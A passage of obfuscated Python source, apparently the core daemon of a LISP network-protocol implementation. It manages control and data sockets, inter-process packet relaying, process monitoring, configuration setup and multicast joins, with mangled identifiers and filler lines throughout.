if 88 - 88: O0 . oO0o % I1IiiI
if 10 - 10: I1IiiI + O0
if 75 - 75: O0 % iIii1I11I1II1 / OoOoOO00 % OOooOOo / IiII
if 31 - 31: i11iIiiIii * OoOoOO00
if ( bottle_port < 0 ) :
bottle . run ( host = "0.0.0.0" , port = - bottle_port )
return
if 69 - 69: i11iIiiIii
if 61 - 61: O0
bottle . server_names [ "lisp-ssl-server" ] = O0oooo0O
if 21 - 21: OoO0O00 % iIii1I11I1II1 . OoO0O00
if 99 - 99: o0oOOo0O0Ooo * OOooOOo % oO0o * oO0o + OoooooooOO
if 82 - 82: I11i / OoOoOO00 - OOooOOo / ooOoO0o
if 50 - 50: OOooOOo + OoO0O00 . i11iIiiIii + I1ii11iIi11i + i11iIiiIii
try :
bottle . run ( host = "0.0.0.0" , port = bottle_port , server = "lisp-ssl-server" ,
fast = True )
except :
bottle . run ( host = "0.0.0.0" , port = bottle_port , fast = True )
if 31 - 31: oO0o * I1Ii111 . OoOoOO00 * I11i
return
if 28 - 28: IiII + I1IiiI - Oo0Ooo % OOooOOo . I11i + I1IiiI
if 72 - 72: Ii1I / Oo0Ooo / oO0o * OoOoOO00 + OOooOOo
if 58 - 58: o0oOOo0O0Ooo % I1IiiI . I1IiiI * OoO0O00 - IiII . OoooooooOO
if 10 - 10: I1Ii111
if 48 - 48: iII111i * i1IIi % OoooooooOO * Ii1I * OoO0O00
if 7 - 7: iII111i . Ii1I . iII111i - I1Ii111
if 33 - 33: ooOoO0o + OoooooooOO - OoO0O00 / i1IIi / OoooooooOO
if 82 - 82: I1ii11iIi11i / OOooOOo - iII111i / Oo0Ooo * OoO0O00
def o00OIIIIIiiI ( ) :
lisp . lisp_set_exception ( )
if 38 - 38: O0
return
if 79 - 79: i1IIi . oO0o
if 34 - 34: I1Ii111 * II111iiii
if 71 - 71: IiII
if 97 - 97: I1ii11iIi11i
if 86 - 86: Oo0Ooo - OOooOOo . OoOoOO00 . II111iiii * I1IiiI . II111iiii
if 34 - 34: o0oOOo0O0Ooo . I1Ii111 % IiII - O0 / I1Ii111
if 91 - 91: i11iIiiIii % I1Ii111 * oO0o - I1ii11iIi11i . I1Ii111
if 28 - 28: i11iIiiIii
if 51 - 51: I1IiiI + ooOoO0o * O0 . Ii1I
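# Once per second, check whether each companion LISP process (lisp-itr, lisp-etr,
# lisp-rtr, lisp-mr, lisp-ms, lisp-ddt) is running, log up/down transitions, and resend
# the stored configuration to a process that has just come up.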
def O00Oo00OOoO0 ( lisp_socket ) :
lisp . lisp_set_exception ( )
IIiiI = { "lisp-itr" : False , "lisp-etr" : False , "lisp-rtr" : False ,
"lisp-mr" : False , "lisp-ms" : False , "lisp-ddt" : False }
if 99 - 99: OoO0O00 / i1IIi . I1ii11iIi11i
while ( True ) :
time . sleep ( 1 )
I1I1i11iiiiI = IIiiI
IIiiI = { }
if 66 - 66: oO0o / OoOoOO00
for OOoO00ooO in I1I1i11iiiiI :
IIiiI [ OOoO00ooO ] = lisp . lisp_is_running ( OOoO00ooO )
if ( I1I1i11iiiiI [ OOoO00ooO ] == IIiiI [ OOoO00ooO ] ) : continue
if 13 - 13: II111iiii
lisp . lprint ( "*** Process '{}' has {} ***" . format ( OOoO00ooO ,
"come up" if IIiiI [ OOoO00ooO ] else "gone down" ) )
if 55 - 55: Oo0Ooo % i1IIi * I11i
if 95 - 95: OOooOOo / II111iiii - o0oOOo0O0Ooo % I1Ii111 . I11i
if 63 - 63: iIii1I11I1II1 / ooOoO0o
if 24 - 24: Oo0Ooo / iIii1I11I1II1 % OOooOOo * OoOoOO00 - iIii1I11I1II1
if ( IIiiI [ OOoO00ooO ] == True ) :
lisp . lisp_ipc_lock . acquire ( )
lispconfig . lisp_send_commands ( lisp_socket , OOoO00ooO )
lisp . lisp_ipc_lock . release ( )
if 50 - 50: II111iiii
if 39 - 39: II111iiii . OoOoOO00 - Oo0Ooo * i1IIi . OoooooooOO
if 44 - 44: I1IiiI
return
if 55 - 55: oO0o . I1Ii111 * I1Ii111
if 82 - 82: I1IiiI % OoO0O00 % I11i + I11i
if 6 - 6: Oo0Ooo
if 73 - 73: I1Ii111 * I1ii11iIi11i + o0oOOo0O0Ooo - Oo0Ooo . I11i
if 93 - 93: i11iIiiIii
if 80 - 80: i1IIi . I1IiiI - oO0o + OOooOOo + iII111i % oO0o
if 13 - 13: II111iiii / OoOoOO00 / OoOoOO00 + ooOoO0o
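# Periodic (60-second) sweep of the NAT info-source table: entries selected for timeout
# are removed from the address table along with their nonce index; entries marked
# no_timeout are never removed.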
def Ii1i ( ) :
lisp . lisp_set_exception ( )
ooooOoOooo00Oo = 60
if 72 - 72: I11i
while ( True ) :
time . sleep ( ooooOoOooo00Oo )
if 26 - 26: IiII % Oo0Ooo
OoOOoo = [ ]
II1ii1 = lisp . lisp_get_timestamp ( )
if 34 - 34: OoOoOO00 - oO0o * OoooooooOO
if 5 - 5: i11iIiiIii * iII111i - Ii1I - I1ii11iIi11i - i1IIi + iII111i
if 4 - 4: ooOoO0o + O0 . i1IIi * I1ii11iIi11i - o0oOOo0O0Ooo
if 42 - 42: o0oOOo0O0Ooo * OoOoOO00 . OoO0O00 - iII111i / II111iiii
for iii1I1Iii in lisp . lisp_info_sources_by_address :
OoooOO0Oo0 = lisp . lisp_info_sources_by_address [ iii1I1Iii ]
if ( OoooOO0Oo0 . no_timeout ) : continue
if ( OoooOO0Oo0 . uptime + ooooOoOooo00Oo < II1ii1 ) : continue
if 25 - 25: Oo0Ooo % OoOoOO00
OoOOoo . append ( iii1I1Iii )
if 75 - 75: i1IIi
O0OOO0 = OoooOO0Oo0 . nonce
if ( O0OOO0 == None ) : continue
if ( O0OOO0 in lisp . lisp_info_sources_by_nonce ) :
lisp . lisp_info_sources_by_nonce . pop ( O0OOO0 )
if 74 - 74: Oo0Ooo + I1Ii111 - oO0o - OoO0O00 + iII111i - iIii1I11I1II1
if 54 - 54: I1ii11iIi11i + II111iiii . I1IiiI / OoO0O00 . ooOoO0o
if 58 - 58: IiII % i11iIiiIii * II111iiii . I1ii11iIi11i
if 94 - 94: i11iIiiIii . OOooOOo + iIii1I11I1II1 * I1Ii111 * I1Ii111
if 36 - 36: I11i - IiII . IiII
if 60 - 60: i11iIiiIii * Oo0Ooo % OoO0O00 + OoO0O00
for iii1I1Iii in OoOOoo :
lisp . lisp_info_sources_by_address . pop ( iii1I1Iii )
if 84 - 84: iIii1I11I1II1 + OoooooooOO
if 77 - 77: O0 * I1ii11iIi11i * oO0o + OoO0O00 + I1ii11iIi11i - I1Ii111
return
if 10 - 10: I1ii11iIi11i + IiII
if 58 - 58: I1IiiI + OoooooooOO / iII111i . ooOoO0o % o0oOOo0O0Ooo / I1ii11iIi11i
if 62 - 62: II111iiii
if 12 - 12: IiII + II111iiii
if 92 - 92: I1Ii111 % iIii1I11I1II1 - iII111i / i11iIiiIii % ooOoO0o * o0oOOo0O0Ooo
if 80 - 80: iII111i
if 3 - 3: I1ii11iIi11i * I11i
if 53 - 53: iIii1I11I1II1 / iII111i % OoO0O00 + IiII / ooOoO0o
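# IPC loop: receive "control-packet" messages from companion processes, log them, proxy
# Map-Replies whose nonce matches a registered info-source, relay Map-Notifies sent by
# the lisp-etr to the lisp-itr, and transmit everything else to the destination address
# and port carried in the message.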
def oo00oO ( lisp_ipc_control_socket , lisp_sockets ) :
lisp . lisp_set_exception ( )
while ( True ) :
try : I11i1I11 = lisp_ipc_control_socket . recvfrom ( 9000 )
except : return ( [ "" , "" , "" , "" ] )
IIIi1i1I = I11i1I11 [ 0 ] . split ( "@" )
ooo0O = I11i1I11 [ 1 ]
if 32 - 32: IiII - oO0o . iIii1I11I1II1 . I1Ii111 + II111iiii % OoooooooOO
iIii = IIIi1i1I [ 0 ]
i1IiI1ii1i = IIIi1i1I [ 1 ]
oOoO0o00OO0 = int ( IIIi1i1I [ 2 ] )
Oo000 = IIIi1i1I [ 3 : : ]
if 75 - 75: O0
if ( len ( Oo000 ) > 1 ) :
Oo000 = lisp . lisp_bit_stuff ( Oo000 )
else :
Oo000 = Oo000 [ 0 ]
if 56 - 56: OoO0O00 / II111iiii
if 39 - 39: OoOoOO00 - OoooooooOO - i1IIi / II111iiii
if ( iIii != "control-packet" ) :
lisp . lprint ( ( "lisp_core_control_packet_process() received" + "unexpected control-packet, message ignored" ) )
if 49 - 49: Oo0Ooo + O0 + IiII . II111iiii % ooOoO0o
continue
if 33 - 33: OoOoOO00 . iIii1I11I1II1 / I11i % Ii1I
if 49 - 49: OoO0O00 + II111iiii / IiII - O0 % Ii1I
lisp . lprint ( ( "{} {} bytes from {}, dest/port: {}/{}, control-" + "packet: {}" ) . format ( lisp . bold ( "Receive" , False ) , len ( Oo000 ) ,
# Oo0Ooo / OoO0O00
ooo0O , i1IiI1ii1i , oOoO0o00OO0 , lisp . lisp_format_packet ( Oo000 ) ) )
if 40 - 40: I11i / iII111i + OoO0O00 / OoooooooOO - oO0o / I1Ii111
if 62 - 62: i11iIiiIii - I11i
if 81 - 81: I11i
if 92 - 92: OOooOOo - Oo0Ooo - OoooooooOO / IiII - i1IIi
if 81 - 81: i1IIi / I1Ii111 % i11iIiiIii . iIii1I11I1II1 * OoOoOO00 + OoooooooOO
if 31 - 31: i1IIi % II111iiii
I1ii1II1iII = lisp . lisp_control_header ( )
I1ii1II1iII . decode ( Oo000 )
if ( I1ii1II1iII . type == lisp . LISP_MAP_REPLY ) :
i1I1i1i1I1 = lisp . lisp_map_reply ( )
i1I1i1i1I1 . decode ( Oo000 )
if ( iiIIIIiI111 ( None , 0 , i1I1i1i1I1 . nonce ) ) :
oooO0o ( lisp_sockets , ooo0O , oOoO0o00OO0 , Oo000 )
continue
if 13 - 13: iIii1I11I1II1 - II111iiii % O0 . Ii1I % OoO0O00
if 2 - 2: OoooooooOO - Ii1I % oO0o / I1IiiI / o0oOOo0O0Ooo
if 3 - 3: II111iiii / OOooOOo
if 48 - 48: ooOoO0o . I1ii11iIi11i
if 49 - 49: i1IIi - OoOoOO00 . Oo0Ooo + iIii1I11I1II1 - ooOoO0o / Oo0Ooo
if 24 - 24: oO0o - iII111i / ooOoO0o
if 10 - 10: OoOoOO00 * i1IIi
if 15 - 15: I11i + i1IIi - II111iiii % I1IiiI
if ( I1ii1II1iII . type == lisp . LISP_MAP_NOTIFY and ooo0O == "lisp-etr" ) :
Oo0O00Oo0o0 = lisp . lisp_packet_ipc ( Oo000 , ooo0O , oOoO0o00OO0 )
lisp . lisp_ipc ( Oo0O00Oo0o0 , Oo , "lisp-itr" )
continue
if 34 - 34: I1IiiI
if 57 - 57: OOooOOo . Ii1I % o0oOOo0O0Ooo
if 32 - 32: I11i / IiII - O0 * iIii1I11I1II1
if 70 - 70: OoooooooOO % OoooooooOO % OoO0O00
if 98 - 98: OoO0O00
if 18 - 18: I11i + Oo0Ooo - OoO0O00 / I1Ii111 / OOooOOo
if 53 - 53: OOooOOo + o0oOOo0O0Ooo . oO0o / I11i
OoooOo0 = lisp . lisp_convert_4to6 ( i1IiI1ii1i )
OoooOo0 = lisp . lisp_address ( lisp . LISP_AFI_IPV6 , "" , 128 , 0 )
if ( OoooOo0 . is_ipv4_string ( i1IiI1ii1i ) ) : i1IiI1ii1i = "::ffff:" + i1IiI1ii1i
OoooOo0 . store_address ( i1IiI1ii1i )
if 52 - 52: I1Ii111 + I1Ii111
if 73 - 73: o0oOOo0O0Ooo . i11iIiiIii % OoooooooOO + ooOoO0o . OoooooooOO / OOooOOo
if 54 - 54: OoOoOO00 . OoooooooOO
if 36 - 36: oO0o / II111iiii * IiII % I1ii11iIi11i
lisp . lisp_send ( lisp_sockets , OoooOo0 , oOoO0o00OO0 , Oo000 )
if 31 - 31: II111iiii + OOooOOo - OoooooooOO . I11i
return
if 28 - 28: Ii1I . I1ii11iIi11i
if 77 - 77: I1ii11iIi11i % II111iiii
if 81 - 81: OoOoOO00 % Ii1I / O0 * iIii1I11I1II1 % IiII . I1IiiI
if 90 - 90: o0oOOo0O0Ooo
if 44 - 44: o0oOOo0O0Ooo / I1ii11iIi11i . Oo0Ooo + OoOoOO00
if 32 - 32: IiII - ooOoO0o * iII111i * I11i
if 84 - 84: Ii1I + I1ii11iIi11i % I1IiiI + i11iIiiIii
if 37 - 37: I11i % I1ii11iIi11i / ooOoO0o
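# Create ./lisp.config by copying lines from ./lisp.config.example, up to and including
# the first "#----#" separator line.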
def iI11I ( ) :
Oo0O0oooo = open ( "./lisp.config.example" , "r" ) ; I111iI = Oo0O0oooo . read ( ) ; Oo0O0oooo . close ( )
Oo0O0oooo = open ( "./lisp.config" , "w" )
I111iI = I111iI . split ( "\n" )
for OooOO in I111iI :
Oo0O0oooo . write ( OooOO + "\n" )
if ( OooOO [ 0 ] == "#" and OooOO [ - 1 ] == "#" and len ( OooOO ) >= 4 ) :
o0oO = OooOO [ 1 : - 2 ]
ooOo0 = len ( o0oO ) * "-"
if ( o0oO == ooOo0 ) : break
if 61 - 61: II111iiii
if 48 - 48: OOooOOo
Oo0O0oooo . close ( )
return
if 26 - 26: iII111i * I1Ii111 * oO0o * OoOoOO00
if 48 - 48: iII111i % i11iIiiIii . OoooooooOO * IiII % OoO0O00 . iII111i
if 6 - 6: O0 . ooOoO0o - oO0o / i11iIiiIii
if 84 - 84: I11i / I1ii11iIi11i * o0oOOo0O0Ooo * OoO0O00 * OOooOOo * O0
if 83 - 83: O0 % II111iiii + o0oOOo0O0Ooo / OoooooooOO
if 75 - 75: II111iiii . I1IiiI + OOooOOo - OoOoOO00 - O0 . I11i
if 19 - 19: Ii1I * i1IIi % O0 + I11i
if 25 - 25: I1Ii111 - Ii1I / O0 . OoooooooOO % I1IiiI . i1IIi
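# lisp-core startup: print the banner, record version and build information, learn the
# local RLOCs, open the port-4342 control and port-4341 data listen sockets plus the
# IPC sockets, join any decentralized-push multicast groups, and spawn the worker
# threads (IPC control-packet loop, configuration processing, web interface, process
# monitor, and info-source timeout).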
def Ii1iIIII1i ( bottle_port ) :
global Oo0o
global Ii1iI
global Oo
global I1Ii11I1Ii1i
global Ooo
global o0oOoO00o
if 84 - 84: i1IIi - I1IiiI % iII111i
lisp . lisp_i_am ( "core" )
lisp . lisp_set_exception ( )
lisp . lisp_print_banner ( "core-process starting up" )
lisp . lisp_uptime = lisp . lisp_get_timestamp ( )
lisp . lisp_version = commands . getoutput ( "cat lisp-version.txt" )
Oo0o = commands . getoutput ( "cat lisp-build-date.txt" )
if 80 - 80: o0oOOo0O0Ooo % iII111i
if 80 - 80: Ii1I
if 26 - 26: iIii1I11I1II1 . OoooooooOO - iIii1I11I1II1
if 59 - 59: I1ii11iIi11i + I11i . oO0o
if ( lisp . lisp_get_local_addresses ( ) == False ) : return ( False )
if 87 - 87: OoO0O00
if 34 - 34: I1Ii111 . OoOoOO00 / i11iIiiIii / iII111i
if 46 - 46: Oo0Ooo + II111iiii * I1IiiI + OOooOOo
if 31 - 31: Ii1I * o0oOOo0O0Ooo * Ii1I + OoO0O00 * o0oOOo0O0Ooo . I1Ii111
if 89 - 89: OoooooooOO * Ii1I * I1IiiI . ooOoO0o * Ii1I / iII111i
lisp . lisp_ipc_lock = multiprocessing . Lock ( )
if 46 - 46: i11iIiiIii
if 15 - 15: O0 / i1IIi / i1IIi . iII111i % OoOoOO00 + I1IiiI
if 48 - 48: I1Ii111 % iII111i % Ii1I % iIii1I11I1II1 . Ii1I
if 14 - 14: iII111i * OoO0O00 % O0 + I11i + I1ii11iIi11i
if 23 - 23: Oo0Ooo % iII111i + Ii1I - I1Ii111
if 65 - 65: OoooooooOO
if 22 - 22: OOooOOo + II111iiii + Oo0Ooo
if ( os . path . exists ( "lisp.py" ) ) : lisp . lisp_version += "+"
if 83 - 83: ooOoO0o
if 43 - 43: OOooOOo
if 84 - 84: OOooOOo . IiII . iII111i
if 2 - 2: Oo0Ooo - OoOoOO00
if 49 - 49: Ii1I + II111iiii / oO0o - OoOoOO00 % OoOoOO00 + I1IiiI
if 54 - 54: ooOoO0o % Oo0Ooo - OOooOOo
iIi11IiiiII11 = "0.0.0.0" if lisp . lisp_is_raspbian ( ) else "0::0"
if ( os . getenv ( "LISP_ANYCAST_MR" ) == None or lisp . lisp_myrlocs [ 0 ] == None ) :
Ii1iI = lisp . lisp_open_listen_socket ( iIi11IiiiII11 ,
str ( lisp . LISP_CTRL_PORT ) )
else :
iIi11IiiiII11 = lisp . lisp_myrlocs [ 0 ] . print_address_no_iid ( )
Ii1iI = lisp . lisp_open_listen_socket ( iIi11IiiiII11 ,
str ( lisp . LISP_CTRL_PORT ) )
if 26 - 26: iII111i / OoooooooOO - Oo0Ooo
lisp . lprint ( "Listen on {}, port 4342" . format ( iIi11IiiiII11 ) )
if 2 - 2: I1ii11iIi11i - Oo0Ooo
if 4 - 4: O0 / I11i . OoO0O00 - ooOoO0o / OOooOOo
if 25 - 25: I11i * OoOoOO00 - Oo0Ooo . ooOoO0o . oO0o
if 89 - 89: O0 * I11i * OoO0O00
if 3 - 3: OOooOOo / iII111i * iIii1I11I1II1 + II111iiii / o0oOOo0O0Ooo / IiII
if 25 - 25: OoOoOO00 + OoO0O00 % Ii1I % OOooOOo / oO0o
if ( lisp . lisp_external_data_plane ( ) == False ) :
o0oOoO00o = lisp . lisp_open_listen_socket ( iIi11IiiiII11 ,
str ( lisp . LISP_DATA_PORT ) )
lisp . lprint ( "Listen on {}, port 4341" . format ( iIi11IiiiII11 ) )
if 91 - 91: OoO0O00 / OoO0O00 . II111iiii . ooOoO0o - I1IiiI
if 23 - 23: I1IiiI
if 7 - 7: iII111i % I1ii11iIi11i
if 64 - 64: I1Ii111 + i11iIiiIii
if 35 - 35: OoOoOO00 + i1IIi % OOooOOo
if 68 - 68: IiII . ooOoO0o
Oo = lisp . lisp_open_send_socket ( "lisp-core" , "" )
Oo . settimeout ( 3 )
if 64 - 64: i1IIi + Oo0Ooo * I1IiiI / OOooOOo
if 3 - 3: Oo0Ooo / ooOoO0o + ooOoO0o . I1ii11iIi11i
if 50 - 50: iIii1I11I1II1 * oO0o
if 85 - 85: i1IIi
if 100 - 100: OoooooooOO / I11i % OoO0O00 + Ii1I
I1Ii11I1Ii1i = lisp . lisp_open_listen_socket ( "" , "lisp-core-pkt" )
if 42 - 42: Oo0Ooo / IiII . Ii1I * I1IiiI
Ooo = [ Ii1iI , Ii1iI ,
Oo ]
if 54 - 54: OoOoOO00 * iII111i + OoO0O00
if 93 - 93: o0oOOo0O0Ooo / I1IiiI
if 47 - 47: Oo0Ooo * OOooOOo
if 98 - 98: oO0o - oO0o . ooOoO0o
if 60 - 60: I1IiiI * I1ii11iIi11i / O0 + I11i + IiII
threading . Thread ( target = oo00oO ,
args = [ I1Ii11I1Ii1i , Ooo ] ) . start ( )
if 66 - 66: IiII * Oo0Ooo . OoooooooOO * I1Ii111
if 93 - 93: IiII / i1IIi
if 47 - 47: ooOoO0o - Ii1I
if 98 - 98: oO0o . I1Ii111 / OoOoOO00 . ooOoO0o
if 1 - 1: OOooOOo
if 87 - 87: O0 * II111iiii + iIii1I11I1II1 % oO0o % i11iIiiIii - OoOoOO00
if ( os . path . exists ( "./lisp.config" ) == False ) :
lisp . lprint ( ( "./lisp.config does not exist, creating a copy " + "from lisp.config.example" ) )
if 73 - 73: iII111i + Ii1I
iI11I ( )
if 37 - 37: oO0o - iIii1I11I1II1 + II111iiii . Ii1I % iIii1I11I1II1
if 17 - 17: I1Ii111 + i1IIi % O0
if 65 - 65: IiII
if 50 - 50: II111iiii / OoO0O00
if 79 - 79: I1ii11iIi11i - iIii1I11I1II1 % i1IIi / Oo0Ooo + II111iiii
if 95 - 95: oO0o
i11ii ( Ii1iI )
if 39 - 39: i1IIi . I1ii11iIi11i / I11i / I11i
threading . Thread ( target = lispconfig . lisp_config_process ,
args = [ Oo ] ) . start ( )
if 100 - 100: OoooooooOO - OoooooooOO + IiII
if 32 - 32: OoOoOO00 * o0oOOo0O0Ooo / OoooooooOO
if 90 - 90: I1Ii111
if 35 - 35: II111iiii / Ii1I
threading . Thread ( target = oOooOoOOo0O ,
args = [ bottle_port ] ) . start ( )
threading . Thread ( target = o00OIIIIIiiI , args = [ ] ) . start ( )
if 79 - 79: OoOoOO00 + I1Ii111 * iII111i * Ii1I
if 53 - 53: OOooOOo / Oo0Ooo
if 10 - 10: I1ii11iIi11i . o0oOOo0O0Ooo
if 75 - 75: O0 * i1IIi - I11i / OOooOOo % OOooOOo / OoOoOO00
threading . Thread ( target = O00Oo00OOoO0 ,
args = [ Oo ] ) . start ( )
if 5 - 5: O0 - iII111i / I1Ii111 . o0oOOo0O0Ooo
if 7 - 7: I1ii11iIi11i - OoOoOO00
if 54 - 54: oO0o / iIii1I11I1II1 / OoooooooOO . i1IIi - OoOoOO00
if 57 - 57: iIii1I11I1II1 * Ii1I * iII111i / oO0o
threading . Thread ( target = Ii1i ) . start ( )
return ( True )
if 46 - 46: Ii1I
if 61 - 61: o0oOOo0O0Ooo / ooOoO0o - II111iiii
if 87 - 87: I1ii11iIi11i / I1IiiI
if 45 - 45: OoOoOO00 * ooOoO0o / OoooooooOO + OoO0O00 . I1Ii111 / OoO0O00
if 64 - 64: Ii1I / i1IIi % I1IiiI - o0oOOo0O0Ooo
if 11 - 11: I1ii11iIi11i - OoooooooOO
if 16 - 16: IiII % OoooooooOO - ooOoO0o * Ii1I - Ii1I
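# Close the lisp-core sockets (IPC command socket, IPC packet socket, control listen
# socket, and data listen socket) on shutdown.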
def I1iiII1 ( ) :
if 45 - 45: OoO0O00 + OoO0O00 % ooOoO0o
if 36 - 36: Ii1I * I11i . I11i / Oo0Ooo / I1IiiI
if 80 - 80: OoooooooOO - i1IIi
if 51 - 51: i1IIi . OoOoOO00 / OoOoOO00 % i11iIiiIii * OOooOOo - I1Ii111
lisp . lisp_close_socket ( Oo , "lisp-core" )
lisp . lisp_close_socket ( I1Ii11I1Ii1i , "lisp-core-pkt" )
lisp . lisp_close_socket ( Ii1iI , "" )
lisp . lisp_close_socket ( o0oOoO00o , "" )
return
if 49 - 49: Oo0Ooo - iIii1I11I1II1
if 64 - 64: I1Ii111 + iIii1I11I1II1
if 14 - 14: Ii1I / OoooooooOO + II111iiii . O0 / i1IIi
if 58 - 58: o0oOOo0O0Ooo / i11iIiiIii / O0 % I11i % I1IiiI
if 86 - 86: IiII + OoOoOO00 / I1IiiI + I11i % I11i / i11iIiiIii
if 12 - 12: OoOoOO00 + o0oOOo0O0Ooo . I1Ii111
if 52 - 52: OoO0O00
if 4 - 4: Ii1I % I1ii11iIi11i + I11i - I1ii11iIi11i
if 98 - 98: Ii1I - O0 * oO0o * Ii1I * Ii1I
if 44 - 44: IiII + I11i
if 66 - 66: oO0o
if 34 - 34: iII111i % i11iIiiIii + i11iIiiIii - iII111i
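# If "decentralized-xtr = yes" is configured, collect every map-server address in
# ./lisp.config that falls in the multicast range 224/4 and join those groups on the
# eth0 interface with the supplied listen socket.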
def i11ii ( lisp_socket ) :
if 2 - 2: II111iiii + i1IIi
Oo0O0oooo = open ( "./lisp.config" , "r" ) ; I111iI = Oo0O0oooo . read ( ) ; Oo0O0oooo . close ( )
I111iI = I111iI . split ( "\n" )
if 68 - 68: OOooOOo + Ii1I
if 58 - 58: IiII * Ii1I . i1IIi
if 19 - 19: oO0o
if 85 - 85: ooOoO0o - I1IiiI / i1IIi / OoO0O00 / II111iiii
if 94 - 94: iIii1I11I1II1 + IiII
II11II = False
for OooOO in I111iI :
if ( OooOO [ 0 : 1 ] == "#-" and OooOO [ - 2 : - 1 ] == "-#" ) : break
if ( OooOO == "" or OooOO [ 0 ] == "#" ) : continue
if ( OooOO . find ( "decentralized-xtr = yes" ) == - 1 ) : continue
II11II = True
break
if 40 - 40: iII111i + O0
if ( II11II == False ) : return
if 18 - 18: iIii1I11I1II1 % iIii1I11I1II1 % oO0o + I1IiiI % ooOoO0o / Ii1I
if 36 - 36: OoOoOO00 . i11iIiiIii
if 81 - 81: Oo0Ooo * iII111i * OoO0O00
if 85 - 85: O0 * oO0o
if 39 - 39: II111iiii * I1IiiI - iIii1I11I1II1
Ii1 = [ ]
o0OOOoo0000 = False
for OooOO in I111iI :
if ( OooOO [ 0 : 1 ] == "#-" and OooOO [ - 2 : - 1 ] == "-#" ) : break
if ( OooOO == "" or OooOO [ 0 ] == "#" ) : continue
if 19 - 19: OoooooooOO . I1IiiI + I1Ii111 - I1IiiI / I1IiiI % IiII
if ( OooOO . find ( "lisp map-server" ) != - 1 ) :
o0OOOoo0000 = True
continue
if 4 - 4: i11iIiiIii * I1ii11iIi11i + OoooooooOO - IiII . ooOoO0o . iIii1I11I1II1
if ( OooOO [ 0 ] == "}" ) :
o0OOOoo0000 = False
continue
if 48 - 48: o0oOOo0O0Ooo * oO0o . I1IiiI - I1Ii111 + OOooOOo . Oo0Ooo
if 62 - 62: I11i + OoooooooOO * iIii1I11I1II1 / i1IIi * O0
if 10 - 10: iIii1I11I1II1 * OoooooooOO / OOooOOo
if 33 - 33: o0oOOo0O0Ooo % IiII - iIii1I11I1II1 % OOooOOo + I1Ii111 - i11iIiiIii
if 91 - 91: OoooooooOO . iIii1I11I1II1 / i11iIiiIii
if ( o0OOOoo0000 and OooOO . find ( "address = " ) != - 1 ) :
oOOOO = OooOO . split ( "address = " ) [ 1 ]
OoOOoo0 = int ( oOOOO . split ( "." ) [ 0 ] )
if ( OoOOoo0 >= 224 and OoOOoo0 < 240 ) : Ii1 . append ( oOOOO )
if 93 - 93: II111iiii * OoOoOO00 % o0oOOo0O0Ooo
if 67 - 67: o0oOOo0O0Ooo + Oo0Ooo . ooOoO0o - i1IIi . OoOoOO00
if ( Ii1 == [ ] ) : return
if 12 - 12: IiII / OoO0O00 / O0 * IiII
if 51 - 51: ooOoO0o * iII111i / i1IIi
if 2 - 2: oO0o + IiII . iII111i - i1IIi + I1Ii111
if 54 - 54: OoooooooOO . oO0o - iII111i
II1i111 = commands . getoutput ( 'ifconfig eth0 | egrep "inet "' )
if ( II1i111 == "" ) : return
oO0o00o000Oo0 = II1i111 . split ( ) [ 1 ]
if 1 - 1: I1IiiI - I1Ii111
if 62 - 62: OoO0O00 . iII111i . iII111i % i1IIi * oO0o % Oo0Ooo
if 20 - 20: ooOoO0o . IiII / I11i . OoooooooOO * OOooOOo + Ii1I
if 2 - 2: I1IiiI
I1i111iiIIIi = socket . inet_aton ( oO0o00o000Oo0 )
for oOOOO in Ii1 :
lisp_socket . setsockopt ( socket . SOL_SOCKET , socket . SO_REUSEADDR , 1 )
lisp_socket . setsockopt ( socket . IPPROTO_IP , socket . IP_MULTICAST_IF , I1i111iiIIIi )
IIii1Ii = socket . inet_aton ( oOOOO ) + I1i111iiIIIi
lisp_socket . setsockopt ( socket . IPPROTO_IP , socket . IP_ADD_MEMBERSHIP , IIii1Ii )
lisp . lprint ( "Setting multicast listen socket for group {}" . format ( oOOOO ) )
if 98 - 98: II111iiii + Oo0Ooo * iIii1I11I1II1 * I1ii11iIi11i + OOooOOo * Ii1I
if 76 - 76: ooOoO0o . oO0o
return
if 60 - 60: OOooOOo * ooOoO0o * OoO0O00
if 64 - 64: I11i / II111iiii / OoO0O00 - ooOoO0o * iIii1I11I1II1 . iII111i
if 25 - 25: OOooOOo - Ii1I . I11i
if 57 - 57: o0oOOo0O0Ooo + Oo0Ooo * I1ii11iIi11i - ooOoO0o % iIii1I11I1II1 - Ii1I
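# Main entry point for the lisp-core process: the web-interface port may be supplied as
# argv[1] (default 8080). After startup, receive control messages on the port-4342
# listen socket and dispatch them until the socket is closed, then clean up and exit.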
III1I11II11I = int ( sys . argv [ 1 ] ) if ( len ( sys . argv ) > 1 ) else 8080
if 78 - 78: I1ii11iIi11i . I1Ii111 . I1Ii111 . I11i % iII111i
if 26 - 26: ooOoO0o + OoO0O00 / OoOoOO00 . II111iiii * Ii1I
if 21 - 21: I1IiiI - I1IiiI + iII111i % I1IiiI * oO0o
if 74 - 74: iII111i / I11i . I1IiiI - OoooooooOO + II111iiii + I11i
if ( Ii1iIIII1i ( III1I11II11I ) == False ) :
lisp . lprint ( "lisp_core_startup() failed" )
lisp . lisp_print_banner ( "lisp-core abnormal exit" )
exit ( 1 )
if 36 - 36: Ii1I * I1IiiI * I1ii11iIi11i . I11i * I1ii11iIi11i
if 76 - 76: OOooOOo + O0 / IiII - OoO0O00
while ( True ) :
if 27 - 27: Oo0Ooo - iIii1I11I1II1 * iII111i * II111iiii * I1ii11iIi11i
if 9 - 9: i11iIiiIii + OOooOOo - OoOoOO00 / ooOoO0o % i1IIi / oO0o
if 22 - 22: i1IIi
if 3 - 3: OoO0O00 * I1ii11iIi11i - iII111i + I1ii11iIi11i
if 63 - 63: I11i * ooOoO0o % II111iiii % I1Ii111 + I1IiiI * Oo0Ooo
iIii , ooo0O , oOoO0o00OO0 , Oo000 = lisp . lisp_receive ( Ii1iI , False )
if 96 - 96: IiII
if ( ooo0O == "" ) : break
if 99 - 99: iIii1I11I1II1 - ooOoO0o
if 79 - 79: I1IiiI + oO0o % I11i % oO0o
if 56 - 56: I1ii11iIi11i + oO0o . OoO0O00 + OoooooooOO * I1ii11iIi11i - O0
if 35 - 35: OOooOOo . I11i . I1Ii111 - I11i % I11i + I1Ii111
ooo0O = lisp . lisp_convert_6to4 ( ooo0O )
oooO0o ( Ooo , ooo0O , oOoO0o00OO0 , Oo000 )
if 99 - 99: o0oOOo0O0Ooo + OOooOOo
if 34 - 34: I1Ii111 * o0oOOo0O0Ooo . I1IiiI % i11iIiiIii
I1iiII1 ( )
lisp . lisp_print_banner ( "lisp-core normal exit" )
exit ( 0 )
if 61 - 61: iIii1I11I1II1 + oO0o * I11i - i1IIi % oO0o
if 76 - 76: oO0o / OoOoOO00
